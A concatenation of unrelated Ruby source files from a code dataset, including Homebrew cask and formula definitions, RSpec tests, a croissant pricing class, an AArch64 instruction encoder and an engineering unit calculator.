categories = @doc.xpath( "//property[@name = 'categories']/@value").text["PostInstallation"]
if categories == nil
[email protected]( "//property[@name = 'categories']/@value").text["FunctionalTest"]
end
if categories == nil
[email protected]( "//property[@name = 'categories']/@value").text["PreInstallation"]
end
if categories == nil
[email protected]( "//property[@name = 'categories']/@value").text["RestCategory"]
if categories != nil
categories = "FunctionalTest"
end
end
if cat != categories
cat = categories
totaltests = 0
totaltime = 0
totalfailures = 0
end
#puts categories
#puts "timestamp: " + @doc.xpath("//property[@name = 'timestamp']/@value").text
if timestamp == 0
timestamp = Integer(@doc.xpath("//property[@name = 'timestamp']/@value").text)
timestamp = timestamp * 1000000
end
if timestamp != 0
timestamp = timestamp + 1
end
#puts timestamp
tests = @doc.xpath("//testsuite/@tests").text
totaltests = totaltests + Integer(tests)
#puts "errors: " + @doc.xpath("//testsuite/@errors").text
errors = @doc.xpath("//testsuite/@errors").text
#puts "failures: " + @doc.xpath("//testsuite/@failures").text
failures = @doc.xpath("//testsuite/@failures").text
totalfailures = totalfailures + Integer(failures)
stats[categories] = {"totaltime" => 0, "totalfailures" => 0, "totaltests" => 0}
stats[categories]["totaltime"]=totaltime
stats[categories]["totalfailures"]=totalfailures
stats[categories]["totaltests"] = totaltests
data = {
values: {
value: i,
tests: tests,
testtime: testtime.to_f,
testname: testname,
errors: errors,
failures: failures,
},
tags: {
run: i,
category: categories
},
timestamp: Integer(timestamp)
}
#puts data
influxdb.write_point(singlestats,data,time_precision)
end
poststats = {
values: {
total: stats["PostInstallation"]["totaltests"],
failures: stats["PostInstallation"]["totalfailures"],
testtime: stats["PostInstallation"]["totaltime"]
},
tags: {
run: i,
category: "PostInstallation"
},
timestamp: timestamp
}
functionalstats = {
values: {
total: stats["FunctionalTest"]["totaltests"],
failures: stats["FunctionalTest"]["totalfailures"],
testtime: stats["FunctionalTest"]["totaltime"]
},
tags: {
run: i,
category: "FunctionalTest"
},
timestamp: timestamp
}
influxdb.write_point(fullstats,poststats,time_precision)
influxdb.write_point(fullstats,functionalstats,time_precision)
end
| 26.335443 | 128 | 0.622927 |
87bb10ff428b0c5b79e745f52e876609a57b6327 | 1,317 | cask 'imazing-mini' do
version '2'
sha256 :no_check # required as upstream package is updated in-place
# dl.devmate.com was verified as official when first introduced to the cask
url "https://dl.devmate.com/com.DigiDNA.iMazing#{version}Mac.Mini/iMazingMini#{version}forMac.dmg"
name 'iMazing Mini'
homepage 'https://imazing.com/mini'
conflicts_with cask: 'imazing'
depends_on macos: '>= 10.8'
app 'iMazing Mini.app'
uninstall login_item: 'iMazing Mini',
quit: "com.DigiDNA.iMazing#{version}Mac.Mini"
zap trash: [
'~/Library/Application Support/iMazing',
'~/Library/Application Support/iMazing Mini',
'~/Library/Application Support/MobileSync/Backup/iMazing.Versions',
"~/Library/Caches/com.DigiDNA.iMazing#{version}Mac.Mini",
"~/Library/Caches/com.plausiblelabs.crashreporter.data/com.DigiDNA.iMazing#{version}Mac.Mini",
'~/Library/Caches/iMazing',
"~/Library/Preferences/com.DigiDNA.iMazing#{version}Mac.Mini.plist",
'/Users/Shared/iMazing Mini',
]
caveats <<~EOS
Performing a zap on this cask removes files pertaining to both #{token}
and imazing, so it should not be done if you only want to uninstall one of them.
EOS
end
| 38.735294 | 109 | 0.660592 |
6224c5dbac06b41bf675bf77d3d7978a3f77f85e | 857 | # -*- encoding: utf-8 -*-
$:.push File.expand_path("../lib", __FILE__)
require 'automux/version'
require 'automux/installation'
Gem::Specification.new do |gem|
gem.name = 'automux'
gem.version = Automux::Version::STRING
gem.authors = ["Alex Johnson"]
gem.email = ["github.com/notalex"]
gem.description = %[Highly configurable Tmux Automator]
gem.summary = %[Automate tmux sessions stored in yaml files using custom recipes]
gem.homepage = %[https://github.com/notalex/automux]
gem.license = %[MIT License]
gem.files = %x[git ls-files].split($/)
gem.executables = gem.files.grep(%r{^bin/}).map { |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.require_paths = %w(lib)
gem.post_install_message = Automux::Installation::MESSAGE
end
| 38.954545 | 89 | 0.648775 |
614a8ee1fccc6095b2f3ee591f487ee481c45de9 | 3,505 | require 'spec_helper'
describe 'archive::parse_artifactory_url' do
it { is_expected.not_to eq(nil) }
it { is_expected.to run.with_params.and_raise_error(ArgumentError) }
it { is_expected.to run.with_params('not_a_url').and_raise_error(ArgumentError) }
context 'releases' do
it do
is_expected.to run.with_params('https://repo.jfrog.org/artifactory/repo1-cache/maven-proxy/maven-proxy-webapp/0.2/maven-proxy-webapp-0.2.war').and_return(
'base_url' => 'https://repo.jfrog.org/artifactory',
'repository' => 'repo1-cache',
'org_path' => 'maven-proxy',
'module' => 'maven-proxy-webapp',
'base_rev' => '0.2',
'folder_iteg_rev' => nil,
'file_iteg_rev' => nil,
'classifier' => nil,
'ext' => 'war'
)
end
context 'with classifier' do
it do
is_expected.to run.with_params('https://repo.jfrog.org/artifactory/repo1-cache/maven-proxy/maven-proxy-standalone/0.2/maven-proxy-standalone-0.2-app.jar').and_return(
'base_url' => 'https://repo.jfrog.org/artifactory',
'repository' => 'repo1-cache',
'org_path' => 'maven-proxy',
'module' => 'maven-proxy-standalone',
'base_rev' => '0.2',
'folder_iteg_rev' => nil,
'file_iteg_rev' => nil,
'classifier' => 'app',
'ext' => 'jar'
)
end
end
end
context 'SNAPSHOTs' do
it do
is_expected.to run.with_params('https://repo.jfrog.org/artifactory/java.net-cache/com/sun/grizzly/grizzly-framework/2.0.0-SNAPSHOT/grizzly-framework-2.0.0-SNAPSHOT.jar').and_return(
'base_url' => 'https://repo.jfrog.org/artifactory',
'repository' => 'java.net-cache',
'org_path' => 'com/sun/grizzly',
'module' => 'grizzly-framework',
'base_rev' => '2.0.0',
'folder_iteg_rev' => 'SNAPSHOT',
'file_iteg_rev' => 'SNAPSHOT',
'classifier' => nil,
'ext' => 'jar'
)
end
context 'with classifiers' do
it do
is_expected.to run.with_params('https://repo.jfrog.org/artifactory/java.net-cache/com/sun/grizzly/grizzly-framework/2.0.0-SNAPSHOT/grizzly-framework-2.0.0-SNAPSHOT-javadoc.jar').and_return(
'base_url' => 'https://repo.jfrog.org/artifactory',
'repository' => 'java.net-cache',
'org_path' => 'com/sun/grizzly',
'module' => 'grizzly-framework',
'base_rev' => '2.0.0',
'folder_iteg_rev' => 'SNAPSHOT',
'file_iteg_rev' => 'SNAPSHOT',
'classifier' => 'javadoc',
'ext' => 'jar'
)
end
it do
is_expected.to run.with_params('https://repo.jfrog.org/artifactory/java.net-cache/com/sun/grizzly/grizzly-framework/2.0.0-SNAPSHOT/grizzly-framework-2.0.0-SNAPSHOT-tests.jar').and_return(
'base_url' => 'https://repo.jfrog.org/artifactory',
'repository' => 'java.net-cache',
'org_path' => 'com/sun/grizzly',
'module' => 'grizzly-framework',
'base_rev' => '2.0.0',
'folder_iteg_rev' => 'SNAPSHOT',
'file_iteg_rev' => 'SNAPSHOT',
'classifier' => 'tests',
'ext' => 'jar'
)
end
end
end
end
| 42.743902 | 197 | 0.542083 |
915edd88922fae89a3aef71114164878fadb78e4 | 1,506 | class Chatbot::Card
include ActiveModel::Model
include Speechable
attr_accessor :components
validates :components, presence: true, length: {
maximum: 6, too_long: I18n.t('errors.chat_statement.card.too_long')
}
validate :recursive_validation
def nature
"card"
end
def components_as_statements
components.collect do |component|
component_as_statement(component)
end
end
private
def recursive_validation
components
.each do |component|
unless ['text', 'image', 'video', 'button', 'button_group', 'map', 'geolocation'].include? component['nature']
errors.add(:base, I18n.t('errors.chat_statement.invalid_nature', nature: component['nature']))
end
end
.map { |component| component_as_statement(component) }
.reject(&:nil?)
.find_all(&:invalid?)
.each { |statement| errors.add(:base, statement.errors.full_messages.join(', ')) }
end
def component_as_statement(component)
case component['nature']
when 'text'
Chatbot::Text.new(component['content'])
when 'image'
Chatbot::Image.new(component['content'])
when 'video'
Chatbot::Video.new(component['content'])
when 'button'
Chatbot::Button.new(component['content'])
when 'button_group'
Chatbot::ButtonGroup.new(component['content'])
when 'map'
Chatbot::Map.new(component['content'])
when 'geolocation'
Chatbot::Geolocation.new(component['content'])
end
end
end
| 26.421053 | 118 | 0.666667 |
9199429ef23419d0794557185730ca6ec52e4c50 | 1,908 | require 'spec_helper'
require 'chefspec/cacher'
describe ChefSpec::Cacher do
let(:klass) do
Class.new(RSpec::Core::ExampleGroup) do
extend ChefSpec::Cacher
def self.metadata
{ parent_example_group: { location: 'spec' } }
end
end
end
let(:cache) { described_class.class_variable_get(:@@cache) }
let(:preserve_cache) { false }
before(:each) { described_class.class_variable_set(:@@cache, {}) unless preserve_cache }
describe 'cached' do
it 'lazily defines the results for the cache' do
klass.cached(:chef_run)
expect(klass).to be_method_defined(:chef_run)
end
it 'adds the item to the cache when called' do
runner = double(:runner)
klass.cached(:chef_run) { runner }
klass.new.chef_run
expect(cache[Thread.current.object_id]).to have_key('spec.chef_run')
expect(cache[Thread.current.object_id]['spec.chef_run']).to eq(runner)
end
context 'when multithreaded environment' do
it 'is thread safe' do
(1..2).each do |n|
Thread.new do
klass.cached(:chef_run) { n }
expect(klass.new.chef_run).to eq(n)
end.join
end
end
end
context 'when example groups are defined by looping' do
let(:preserve_cache) { true }
['first', 'second', 'third'].each do |iteration|
context "on the #{iteration} iteration" do
context 'in caching context' do
cached(:cached_iteration) { iteration }
it 'caches the iteration for this context' do
expect(cached_iteration).to eq iteration
end
end
end
end
end
end
describe 'cached!' do
it 'loads the value at runtime' do
expect(klass).to receive(:cached).with(:chef_run).once
expect(klass).to receive(:before).once
klass.cached!(:chef_run) { }
end
end
end
| 26.873239 | 90 | 0.623166 |
ab8d6a77dfe66f9ff6bcfa70a23839c471fb0364 | 2,547 | require 'spec_helper'
describe Spree::Admin::ImageSettingsController do
stub_authorization!
context "updating image settings" do
it "should be able to update paperclip settings" do
spree_put :update, { :preferences => {
"attachment_path" => "foo/bar",
"attachment_default_url" => "baz/bar"
}
}
Spree::Config[:attachment_path].should == "foo/bar"
Spree::Config[:attachment_default_url].should == "baz/bar"
end
context "paperclip styles" do
it "should be able to update the paperclip styles" do
spree_put :update, { "attachment_styles" => { "thumb" => "25x25>" } }
updated_styles = ActiveSupport::JSON.decode(Spree::Config[:attachment_styles])
updated_styles["thumb"].should == "25x25>"
end
it "should be able to add a new style" do
spree_put :update, { "attachment_styles" => { }, "new_attachment_styles" => { "1" => { "name" => "jumbo", "value" => "2000x2000>" } } }
styles = ActiveSupport::JSON.decode(Spree::Config[:attachment_styles])
styles["jumbo"].should == "2000x2000>"
end
end
context "amazon s3" do
after(:all) do
Spree::Image.attachment_definitions[:attachment].delete :storage
end
it "should be able to update s3 settings" do
spree_put :update, { :preferences => {
"use_s3" => "1",
"s3_access_key" => "a_valid_key",
"s3_secret" => "a_secret",
"s3_bucket" => "some_bucket"
}
}
Spree::Config[:use_s3].should be_true
Spree::Config[:s3_access_key].should == "a_valid_key"
Spree::Config[:s3_secret].should == "a_secret"
Spree::Config[:s3_bucket].should == "some_bucket"
end
context "headers" do
before(:each) { Spree::Config[:use_s3] = true }
it "should be able to update the s3 headers" do
spree_put :update, { :preferences => { "use_s3" => "1" }, "s3_headers" => { "Cache-Control" => "max-age=1111" } }
headers = ActiveSupport::JSON.decode(Spree::Config[:s3_headers])
headers["Cache-Control"].should == "max-age=1111"
end
it "should be able to add a new header" do
spree_put :update, { "s3_headers" => { }, "new_s3_headers" => { "1" => { "name" => "Charset", "value" => "utf-8" } } }
headers = ActiveSupport::JSON.decode(Spree::Config[:s3_headers])
headers["Charset"].should == "utf-8"
end
end
end
end
end
| 36.913043 | 143 | 0.584609 |
18fea0e95aa9daf542c6169b81f567be8b64671a | 393 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventGrid::Mgmt::V2019_01_01
module Models
#
# Defines values for ResourceRegionType
#
module ResourceRegionType
RegionalResource = "RegionalResource"
GlobalResource = "GlobalResource"
end
end
end
| 24.5625 | 70 | 0.73028 |
1a67d2ac3dbad9b14c726c32dd193ce02252edf3 | 546 | module AArch64
module Instructions
# LDG -- A64
# Load Allocation Tag
# LDG <Xt>, [<Xn|SP>{, #<simm>}]
class LDG
def initialize xt, xn, imm9
@xt = xt
@xn = xn
@imm9 = imm9
end
def encode
LDG(@imm9, @xn.to_i, @xt.to_i)
end
private
def LDG imm9, xn, xt
insn = 0b11011001_0_1_1_000000000_0_0_00000_00000
insn |= ((imm9 & 0x1ff) << 12)
insn |= ((xn & 0x1f) << 5)
insn |= (xt & 0x1f)
insn
end
end
end
end
| 18.827586 | 57 | 0.485348 |
1d98f78f44fe837f0e6f9bb3faaf99abbb9ac17b | 969 | require 'find'
module Ginseng
class FileFinder
attr_accessor :dir, :patterns, :mtime, :atime, :empty
def initialize
@patterns = []
end
def execute
return enum_for(__method__) unless block_given?
Find.find(@dir) do |f|
next unless match_patterns?(f)
next unless match_mtime?(f)
next unless match_atime?(f)
next unless match_empty?(f)
yield f
end
end
alias exec execute
private
def match_patterns?(path)
return @patterns.any? do |pattern|
File.fnmatch(pattern, File.basename(path))
end
end
def match_mtime?(path)
return true unless @mtime
return File.new(path).mtime < @mtime.days.ago
end
def match_atime?(path)
return true unless @atime
return File.new(path).atime < @atime.days.ago
end
def match_empty?(path)
return true unless @empty
return File.size(path).zero?
end
end
end
| 20.1875 | 57 | 0.621259 |
bb18c2cbbd21fbac9ac2b82d9c54bdb91b8a79c2 | 626 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe CorporationPolicy, type: :policy do
subject { described_class }
let(:user) { User.new }
permissions '.scope' do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :show? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :create? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :update? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :destroy? do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 20.866667 | 58 | 0.691693 |
117ccb090c272e83566eb4eb7c50d034edb4ab8f | 562 | module FunWith
module Patterns
module Loader
# To simplify installing the loader pattern, loader_pattern_configure() is now going to be
# callable on all objects by default, and will include FunWith::Patterns::Loader
module ObjectAPI
def loader_pattern_configure( *args )
include FunWith::Patterns::Loader
# hoping (vainly) that when the include finishes, loader_pattern_configure() is now a different method
loader_pattern_configure( *args )
end
end
end
end
end | 33.058824 | 112 | 0.670819 |
4a80760f19fb67905ba8ed375a7a310f43f2b728 | 3,726 | module Bakery
class Croissant
PACKAGE_OF_3 = 5.95
PACKAGE_OF_5 = 9.95
PACKAGE_OF_9 = 16.99
INVALID_AMOUNTS = [1, 2, 4, 7].freeze
def croissant_pricing(pieces)
return invalid_amount if INVALID_AMOUNTS.include?(pieces)
send("show_price_for_#{pieces % 9}_remainder", pieces)
end
private
def show_price_for_0_remainder(pieces)
total_price = pieces / 9 * PACKAGE_OF_9
package_9_count = pieces / 9
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99"
}
end
def show_price_for_1_remainder(pieces)
total_price = (((pieces / 9 - 1) * PACKAGE_OF_9) + (PACKAGE_OF_5 * 2)).round(2)
package_5_count = 2
package_9_count = pieces / 9 - 1
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_5_count} X 5 $9.95"
}
end
def show_price_for_2_remainder(pieces)
total_price = (((pieces / 9 - 1) * PACKAGE_OF_9) + (PACKAGE_OF_5 + PACKAGE_OF_3 * 2)).round(2)
package_3_count = 2
package_5_count = 1
package_9_count = pieces / 9 - 1
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_5_count} X 5 $9.95\n#{package_3_count} X 3 $5.95"
}
end
def show_price_for_3_remainder(pieces)
total_price = ((pieces / 9 * PACKAGE_OF_9) + PACKAGE_OF_3).round(2)
package_3_count = 1
package_9_count = pieces / 9
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_3_count} X 3 $5.95"
}
end
def show_price_for_4_remainder(pieces)
total_price = (((pieces / 9 - 1) * PACKAGE_OF_9) + (PACKAGE_OF_3 + PACKAGE_OF_5 * 2)).round(2)
package_3_count = 1
package_5_count = 2
package_9_count = pieces / 9 - 1
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_5_count} X 5 $9.95\n#{package_3_count} X 3 $5.95"
}
end
def show_price_for_5_remainder(pieces)
total_price = ((pieces / 9 * PACKAGE_OF_9) + PACKAGE_OF_5).round(2)
package_5_count = 1
package_9_count = pieces / 9
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_5_count} X 5 $9.95"
}
end
def show_price_for_6_remainder(pieces)
total_price = ((pieces / 9 * PACKAGE_OF_9) + PACKAGE_OF_3 * 2).round(2)
package_3_count = 2
package_9_count = pieces / 9
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_3_count} X 3 $5.95"
}
end
def show_price_for_7_remainder(pieces)
total_price = (((pieces / 9 - 1) * PACKAGE_OF_9) + ((PACKAGE_OF_3 * 2) + (PACKAGE_OF_5 * 2))).round(2)
package_3_count = 2
package_5_count = 2
package_9_count = pieces / 9 - 1
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_5_count} X 5 $9.95\n#{package_3_count} X 3 $5.95"
}
end
def show_price_for_8_remainder(pieces)
total_price = ((pieces / 9 * PACKAGE_OF_9) + PACKAGE_OF_5 + PACKAGE_OF_3).round(2)
package_3_count = 1
package_5_count = 1
package_9_count = pieces / 9
{
total: "#{pieces} CF $#{total_price}",
consists_of: "#{package_9_count} X 9 $16.99\n#{package_5_count} X 5 $9.95\n#{package_3_count} X 3 $5.95"
}
end
def invalid_amount
{ total: "Error: Croissant exact amount can't be served" }
end
end
end
| 28.442748 | 112 | 0.605743 |
e993373ee26b2eda960d46d630a2c5b2591f17d1 | 1,742 | # Copyright 2017 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'google/storage/network/base'
module Google
module Storage
module Network
# A wrapper class for a PUT Request
class Put < Google::Storage::Network::Base
def initialize(link, cred, type, body)
super(link, cred)
@type = type
@body = body
end
def transport(request)
request.content_type = @type
request.body = @body
puts "network(#{request}: body(#{@body}))" \
unless ENV['GOOGLE_HTTP_VERBOSE'].nil?
super(request)
end
end
end
end
end
| 33.5 | 78 | 0.572331 |
ed8c03e0b877addcae6d08b267f2cbddf27a64ae | 1,016 | class Poco < Formula
desc "C++ class libraries for building network and internet-based applications"
homepage "https://pocoproject.org/"
url "https://pocoproject.org/releases/poco-1.10.1/poco-1.10.1-all.tar.gz"
sha256 "7f5931e0bb06bc2880a0f3867053a2fddf6c0d3e5dd96342a665460301fc34ca"
head "https://github.com/pocoproject/poco.git", :branch => "develop"
bottle do
cellar :any
sha256 "0755dff1346ea80aa6202ce3e8269c608960abd4bf0a4566e56075cc99364b57" => :catalina
sha256 "7abccb2c17823c6dda9dee9e5918fa28ef846d8095252681c83c47bbb674f5c8" => :mojave
sha256 "70cea3a570e187c3e70a8dbbe1ad2e43be1c159d0d9118c1bfc1a8cc6441e2a4" => :high_sierra
end
depends_on "cmake" => :build
depends_on "[email protected]"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args,
"-DENABLE_DATA_MYSQL=OFF",
"-DENABLE_DATA_ODBC=OFF"
system "make", "install"
end
end
test do
system bin/"cpspc", "-h"
end
end
| 32.774194 | 93 | 0.701772 |
d5cf84784812567fafaa823a921b55850298baaf | 12,451 | require "engineer_calculator/version"
require 'yaml'
module Engineer
class Calculator
include Math
attr_accessor :error, :alter
def initialize
@error = {}
@opt = nil
end
def calc(formula)
return nil unless formula
@error = {}
@result = {}
@alter = nil
begin
formula = split_unit(formula.gsub("⋅","*")).compact
formula.map! do |each_formula|
if each_formula[:unit].nil?
[each_formula[:value], []]
elsif each_formula[:value] =~ /#{reg(:ari)}/
[each_formula[:value], [each_formula[:value]]]
else
each_formula[:unit]
convert_value = convert(each_formula[:unit])
[sprintf("%.05g", each_formula[:value].to_f * convert_value[0].to_f), convert_value[1].unshift("(").push(")")]
end
end
value = String.new
units = []
formula.each do |x|
value << x[0].to_s.sub("^","**") + (x[0].to_s =~ Regexp.union(reg(:ari),/(?:#{reg(:num)})*(?:#{reg(:double)})+/) ? "" : ".rationalize") unless x[0].empty?
units << x[1]
end
p units
@opt = nil
converted_formula = formula.inject(String.new){ |f, v| f << v[0].to_s + (v[0] != v[1].join ? v[1].join : " ") }
return @result = { value: eval(value).to_f, unit: units.flatten.join, convert_formula: converted_formula } unless @error[:unit_not_found].nil?
@result = { value: sprintf("%.05g", eval(value).to_f), unit: calc_unit(units.flatten), convert_formula: converted_formula }
@alter = search_unit(@result)
@result
rescue StandardError, SyntaxError
@error[:inapprehensible] = "Sorry, we could not calculate"
nil
end
end
def convert(units)
unit = {value: String.new, unit: []}
convert_unit = try_split_each_unit(units).map { |unit|
return [1, [units]] unless @error[:unit_not_found].nil?
convert_to_si_unit(unit)
}.map do |c_value, c_unit, c_type|
if c_type
unit[:value] << c_unit
unit[:unit] << c_unit
else
unit[:value] << "(" + c_value.to_s + "*"
si_unit = split_si_unit(c_unit)
unit[:value] << si_unit[0].to_s + ")"
unit[:unit] << si_unit[1]
end
end
[eval(unit[:value].gsub(/\)\(/,")*(")), unit[:unit].flatten]
end
def try_split_each_unit(units)
type = [:base, :alter, :variable, :base, :ari]
try_method = [
{reg: proc {/#{unit_reg}/}, case: @opt=nil, type: nil},
{reg: proc {/#{unit_reg}/}, case: @opt=:upcase, type: nil},
{reg: proc {/(#{reg(:variable)})/}, case: @opt=:upcase, type: :variable},
]
try_method.each do |try|
unit = []
@opt = try[:case]
app_unit = send_method(units, @opt).scan(try[:reg].call).map do |e_unit|
e_unit.each_with_index { |a_unit,i| unit.push({(try[:type] || type[i]) => a_unit}) if a_unit }
end
next unless app_unit.join == send_method(units, @opt)
@error[:capitalize] = "upper/lower case shall be follows / 大文字、小文字は使い分けてください" if @opt
return unit
end
@error[:unit_not_found] ||= [" could not be found"]
@error[:unit_not_found].unshift(units)
{unit_not_found: units}
end
def send_method(str, method=nil)
method ? str.send(method) : str
end
def calc_unit(units) #配列で単位を受け取る。
par = parenthesis_unit(units)
par.reverse_each do |index|
by_value = units[index[0]..index[1]]
unit = plus_minus_split(by_value)
unit.map! do |each_unit|
multi_div_unit each_unit
end
unit = plus_minus_unit(unit)
add = by_value.include?("(") ? 1 : 0
units[(index[0]+add)..(index[1]-add)] = unit + Array.new(units[(index[0]+add)..(index[1]-add)].size-unit.size)
end
units.compact!
units.reject!{ |x| x =~ /\(|\)/ }
unit_arrange units
end
def unit_arrange(units)
pos = []
neg = []
units.each do |unit|
num = unit.match(/(?<base>#{reg(:base)}){1}(?<num>-*\d*)/)
unless num.nil?
if num[:num].nil? || num[:num].to_i.positive?
number = num[:num].to_i == 1 ? nil : num[:num]
pos << num[:base] + number.to_s
else
number = num[:num].to_i == -1 ? nil : - (num[:num].to_i)
neg << num[:base] + number.to_s
end
end
end
div = neg.size > 1 ? ("/" + "(" + neg.join("*") + ")") : (neg.empty? ? nil : "/" + neg.join.to_s)
pos.join("*") + div.to_s
end
def search_unit(value:, unit:, convert_formula: nil)
compare_unit = multi_div_unit(split_si_unit(unit)[1]).sort
all_unit = {si_unit: [], variable: []}
si_base_unit.merge(si_derived_unit).delete_if { |type, e_unit|
compare_unit != multi_div_unit(split_si_unit(e_unit)[1]).sort
}.each do |unit_name, e_unit|
all_unit[:si_unit] << [unit_name, si_alter_unit[unit_name] ? si_alter_unit[unit_name].join(" : ") : nil ]
all_unit[:variable] << [unit_name, variable_unit[unit_name] ? variable_unit[unit_name].map { |v_unit, v_value| [v_unit, value.to_f * v_value.to_f] } : nil]
end
all_unit
end
def plus_minus_unit(array)
array.each_with_index do |value, i|
unless i == 0 || (array[i-1].sort == array[i].sort)
@error[:plus_minus] ||= ["is different unit./ 足し算の単位が違います。"]
@error[:plus_minus].unshift "#{unit_arrange(array[i-1])} + #{unit_arrange(array[i])}"
end
end
array[0]
end
def plus_minus_split(units)
if units.any?{|x| x=="+" || x=="-"}
num = [0]
array = []
units.each_with_index { |x, i| num << i if x == "+" || x == "-" }
num << units.size - 1
num.each_with_index { |x, i| array << units[num[i-1]..x].reject!{|x| ["+", "-"].include?(x) } unless i==0 }
array
else
[units]
end
end
def multi_div_unit(units)
unit_hash = Hash.new(0)
ari = "+"
end_par = "+"
units.compact! unless units.nil?
units.each do |unit|
case unit
when "*", "・", "⋅"
ari = "+" unless end_par == "-"
when "/"
ari = "-"
when "("
end_par = "-" if ari == "-"
when ")"
end_par = "+"
else
num = unit.match(/(?<base>#{reg(:base)}){1}(?<num>-*\d*)/)
base = num[:base]
num = num[:num].empty? ? 1 : num[:num]
unit_hash[base] = eval(unit_hash[base].to_s + ari + num.to_s)
ari = "+" unless end_par == "-"
end
end
unit_hash.sort{|a,b| b[1] <=> a[1]}.map { |key, value| value == 0 ? nil : key + value.to_s}.compact
end
def parenthesis_unit(formula) #formulaは配列で入ってくる。["m","/","s"]
array = []
count = []
formula.each_with_index do |value, index|
case value
when "("
array.push [index, nil]
count << array.size - 1
when ")"
array[count.pop][1] = index
end
end
array.unshift([0,formula.size-1])
end
def split_si_unit(si_unit)
unit = si_unit.split(/([\*\/\(\)])/).reject(&:empty?).map do |s_unit|
s_unit =~ /([\*\/\(\)])/ ? s_unit : extraction_metric(s_unit)
end
value = String.new
unit_si = []
unit.each do |each_unit|
case each_unit
when Array
value << each_unit[0].to_s
unit_si << each_unit[1]
when String
value << each_unit.to_s
unit_si << each_unit
end
end
[eval(value.gsub(/^(#{reg(:ari)})/,"")), unit_si]
end
def extraction_metric(si_unit)
unit = {}
si_unit.upcase! if @opt
si_unit.match(/(?<metric>#{reg(:metric)})?(?<base>(#{reg(:base)}|g){1})(?<numeric>-*\d)*/) do |sp_unit|
unit[:original] = sp_unit[0]
unit[:metric] = @opt && sp_unit[:metric] ? metric_prefix_unit.each_key { |metric| break metric if sp_unit[:metric].upcase == metric.upcase } : sp_unit[:metric]
unit[:base] = @opt ? si_base_unit.each_value { |b_unit| break b_unit if b_unit.upcase == sp_unit[:base].upcase } : sp_unit[:base]
unit[:numeric] = sp_unit[:numeric] || 1
end
metric = if unit[:base] == "g"
unit_base = "kg"
convert_metric_weight(unit[:metric])
else
unit[:metric] ? convert_metric(unit[:metric]).to_f**(unit[:numeric].to_f || 1) : 1
end
[metric.to_f, unit_base || unit[:base] + ( unit[:numeric] != 1 ? unit[:numeric].to_s : "" )]
end
def convert_metric(metric)
metric_prefix_unit[metric]
end
def convert_metric_weight(weight_metric)
convert_metric(weight_metric).to_f / convert_metric("k").to_f
end
def convert_to_si_unit(kind_of_unit)
if kind_of_unit[:alter]
unit = kind_of_unit[:alter]
alter_unit = {}
unit.match(/(?<metric>#{reg(:metric)})?(?<alter>#{reg(:alter)})/) do |si_unit|
alter_unit[:metric] = si_unit[:metric] ? metric_prefix_unit.each { |m_unit, value| break m_unit if si_unit[:metric].upcase == m_unit.upcase } : nil
alter_unit[:alter] = @opt ? si_alter_unit.each { |kind, a_unit| break a_unit[0] if si_unit[:alter].upcase == a_unit[0].upcase } : si_unit[:alter]
end
si_alter_unit.each do |key, value|
return [convert_metric(alter_unit[:metric]) || 1, si_base_unit.merge(si_derived_unit)[key]] if value.include?(alter_unit[:alter])
end
elsif kind_of_unit[:variable]
unit = kind_of_unit[:variable]
variable_unit.each do |kind, v_unit|
return [1.0/v_unit[unit].to_f, si_base_unit.merge(si_derived_unit)[kind]] if v_unit.key?(unit)
v_unit.each do |v_unit_name, value|
return [1.0/value.to_f, si_base_unit.merge(si_derived_unit)[kind]] if v_unit_name.upcase == unit.upcase
end
end
elsif kind_of_unit[:ari]
[kind_of_unit[:ari], kind_of_unit[:ari], :ari]
else
[1, kind_of_unit[:base]]
end
end
def split_unit(formula)
unit_array = []
formula_pre = formula.to_s.delete(" ")
formula_pre.scan(/(#{reg(:tri)})|(?:(#{reg(:num)}(?:#{reg(:double)})*)((?:\/?\(?\/?[a-z]+\d*(?:\*[a-z])*(?:\W*[a-z]\d*\)*)*)(?:-*\d[^[a-z]])*\)?))|(#{reg(:ari)})|((?:#{reg(:num)})*(?:#{reg(:double)})?)/i).each do |data|
unit_array << { value: (data[0] || data[1] || data[3] || data[4]), unit: (data[2] || data[3]) }
end
unit_array.each_with_index do |data, index|
if data[:unit] =~ /^[^\(]+\)$/
data[:unit].gsub!(/.$/,'')
unit_array.insert(index+1, { value: ")", unit: ")" })
end
end
unit_array
end
def si_base_unit
@si_base_unit ||= YAML.load_file(File.join(__dir__, '/unit/si_base_unit.yml'))
end
def si_derived_unit
@si_derived_unit ||= YAML.load_file(File.join(__dir__, 'unit/si_derived_unit.yml'))
end
def variable_unit
@variable_unit ||= YAML.load_file(File.join(__dir__, 'unit/variable_unit.yml'))
end
